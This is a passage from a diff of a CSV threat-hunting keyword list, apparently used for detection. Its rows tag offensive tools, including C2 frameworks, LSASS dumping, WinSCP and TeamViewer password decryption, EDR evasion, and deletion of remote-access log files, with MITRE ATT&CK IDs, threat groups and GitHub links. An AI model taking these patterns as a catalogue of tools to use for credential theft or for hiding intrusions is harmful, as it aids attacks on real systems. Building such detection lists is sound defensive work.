Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
 "*DeEpinGh0st/Erebus*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
 "*deepinstinct/ContainYourself*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
-"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
 "*deepinstinct/NoFilter*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
-"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*deepzec*","offensive_tool_keyword","Github Username","Github Author of malicious scripts and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*defanger exclusion*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
 "*defanger realtime*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
 "*defanger signature*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
-"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*DefaultBeaconApi*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
-"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z"
+"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z"
 "*--defaults-torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
-"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1918","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z"
+"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1919","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z"
 "*DefenderCheck.exe*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
 "*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
@@ -9216,8 +9364,8 @@
 "*DeimosC2*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
 "*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*delegation_constrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*delegation_constrained_w_protocol_transition_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
 "*delegation_rbcd_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
@@ -9231,32 +9379,32 @@
 "*demo-controller.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*Dendrobate-master*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
 "*dendron*FileMonInject.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
-"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
-"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
-"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
-"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
-"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
-"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
